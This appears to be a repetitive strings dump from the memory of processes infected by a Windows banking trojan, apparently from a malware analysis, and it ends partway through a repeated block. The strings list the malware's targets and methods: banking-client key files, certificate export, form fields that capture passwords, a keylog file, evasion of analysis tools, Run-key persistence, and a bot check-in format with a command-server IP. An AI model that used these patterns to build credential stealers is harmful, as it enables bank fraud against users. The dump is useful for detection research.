Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

taskhost.exe_872_rwx_00580000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

taskhost.exe_872_rwx_007C0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1048_rwx_00720000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1048_rwx_00C70000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

